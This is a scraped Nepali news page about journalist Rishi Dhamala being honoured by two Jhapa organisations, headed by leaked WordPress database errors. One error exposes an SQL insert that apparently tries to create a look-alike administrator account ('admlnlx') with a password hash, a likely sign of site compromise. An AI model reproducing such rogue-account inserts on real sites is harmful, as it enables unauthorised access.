WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLUDiKHCh2QMNqpaolATMA7G8z3QP/1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-03 09:55:22', '', 'admlnlx', 'admlnlx')
WordPress database error: [Can't change size of file (Errcode: 28 "No space left on device")]SHOW FULL COLUMNS FROM `gi_postmeta`
झापा,मंंसिर २२ –
पत्रकारिताको माध्यमबाट देशको राष्ट्रिय विकासमा महत्वपूर्ण भूमिका निर्वाह गरेको भन्दै भूमण्डलीय मुनि समाज नेपाल एवम् पाथीभरा कला कुञ्ज झापाले पत्रकार ऋषि धमलालाई अभिनन्दन गरेको छ ।
रिपोर्टर्स क्लब नेपालका अध्यक्ष समेत रहेका पत्रकार धमलाले विभिन्न रेडियो, टेलिभिजन तथा अनलाईन तथा प्रिन्ट मिडियाका माध्यमबाट देशको विकासमा महत्वपूर्ण योगदान पुर्याएको, मुलुकमा राजनीतिक स्थायित्वको लागि निरन्तर दबाब दिएकोले उनलाई सम्मान गरिएको अभिनन्दन पत्रमा उल्लेख गरिएको छ ।
धादिङ्को ज्यामरुङमा जन्मिई काठमाडौंलाई कर्मथलो बनाई पत्रकारितको क्षेत्रमा सुपरिचित व्यक्तित्व ऋषि धमलाले रिपोर्टर्स क्लब नेपालको अध्यक्ष तथा विभिन्न रेडियो, टेलिभिजन संस्थाहरुमा समेत विभिन्न कार्यक्रमको उत्पादक, प्रस्तोता, निर्देशक लगायतका विविध भूमिकाहरु कुशलताका साथ निर्वाह गरेको भन्दै उनलाई सम्मान गरिएको संस्थाले जनाएको छ ।
अभिनन्दन पत्रमा थप भनिएको छ,‘कुशल सञ्चारकर्मीको रुपमा यहाँले राष्ट्रिय विकासमा पु¥याउनुभएको विशिष्ट योगदानको हामी सम्मान गर्दछौं, नेपाली संगीत क्षेत्रका ज्वाजल्यमान नक्षत्र स्वरसमा्रट नारायणगोपाल गुरुवाचार्यको २६ औं स्मृति दिवसको अवसरमा तपाईको जीवनको उत्तरउत्तर प्रगतिको कामना गर्दै नेपाली सञ्चार जगतमा यहाँको गरिमामय उपस्थिति रहने अपेक्षासहित यो अभिनन्द पत्रद्धारा विभुषित गर्दछौं ।’
अभिनन्दपत्रमा संस्थाका अध्यक्षद्धय हेरी आर.डी र दयाराम उप्रेती र व्यवस्थापिका संसदका माननीय सांसद सुधिरकुमार शिवाकोटीको हस्ताक्षर गरिएको छ ।
अभिनन्दित भएपछि पत्रकार धमलाले आफूलाई थप जिम्मेवार थपिएको बताएका छन् । धमलाले देशको विकासको लागि आफू निरन्तर योगदान पुर्याउन तत्पर रहेको स्पष्ट पारे ।